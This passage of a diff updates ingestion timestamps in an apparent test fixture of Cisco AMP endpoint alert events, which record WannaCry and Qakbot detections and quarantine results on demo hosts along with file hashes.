Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3445,7 +3445,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010844300Z", + "ingested": "2021-12-14T14:40:52.874153183Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3519,7 +3519,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010849600Z", + "ingested": "2021-12-14T14:40:52.874153535Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260880", "kind": "alert", @@ -3611,7 +3611,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010854800Z", + "ingested": "2021-12-14T14:40:52.874153888Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", @@ -3693,7 +3693,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010860100Z", + "ingested": "2021-12-14T14:40:52.874154240Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "1090519054", "kind": "alert", @@ -3783,7 +3783,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010865400Z", + "ingested": "2021-12-14T14:40:52.874154587Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", @@ -3857,7 +3857,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010873400Z", + "ingested": "2021-12-14T14:40:52.874154941Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648143", "kind": "alert", @@ -3929,7 +3929,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010878900Z", + "ingested": "2021-12-14T14:40:52.874155286Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -4026,7 +4026,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010884200Z", + "ingested": "2021-12-14T14:40:52.874155643Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -4104,7 +4104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010889500Z", + "ingested": "2021-12-14T14:40:52.874156002Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -4176,7 +4176,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010892700Z", + "ingested": "2021-12-14T14:40:52.874156472Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -4252,7 +4252,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010896900Z", + "ingested": "2021-12-14T14:40:52.874156835Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -4340,7 +4340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010901900Z", + "ingested": "2021-12-14T14:40:52.874157181Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4426,7 +4426,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010906400Z", + "ingested": "2021-12-14T14:40:52.874157530Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4512,7 +4512,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010910200Z", + "ingested": "2021-12-14T14:40:52.874157910Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4598,7 +4598,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010914400Z", + "ingested": "2021-12-14T14:40:52.874158262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4684,7 +4684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010919700Z", + "ingested": "2021-12-14T14:40:52.874158612Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4770,7 +4770,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010923700Z", + "ingested": "2021-12-14T14:40:52.874158959Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 